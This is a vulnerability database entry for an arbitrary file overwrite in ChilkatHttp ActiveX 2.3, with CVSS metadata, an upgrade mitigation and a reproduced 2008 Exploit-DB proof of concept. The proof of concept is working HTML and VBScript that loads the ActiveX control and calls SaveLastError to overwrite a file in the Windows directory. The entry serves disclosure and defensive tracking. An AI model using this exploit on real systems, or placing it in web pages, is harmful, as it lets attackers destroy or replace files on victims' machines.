ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite

vendor:

ChilkatHttp ActiveX

by:

shinnai

9.3

CVSS

HIGH

Arbitrary Files Overwrite

CWE

Product Name: ChilkatHttp ActiveX

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: YES

Related CWE: N/A

CPE: a:chilkatsoft:chilkathttp_activex

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite

An arbitrary file overwrite vulnerability exists in ChilkatHttp ActiveX 2.3. By using the SaveLastError method, an attacker can overwrite arbitrary files on the system. This can be exploited by an attacker to overwrite system files and gain elevated privileges.

Mitigation:

Upgrade to the latest version of ChilkatHttp ActiveX.

Source

Exploit-DB raw data:

--------------------------------------------------------------------
 ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
 url: www.chilkatsoft.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
--------------------------------------------------------------------
<object classid='clsid:B973393F-27C7-4781-877D-8626AAEDF119' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
  test.SaveLastError "c:\windows\system_.ini"
  MsgBox "Exploit completed!"
 End Sub
</script>

# milw0rm.com [2008-04-01]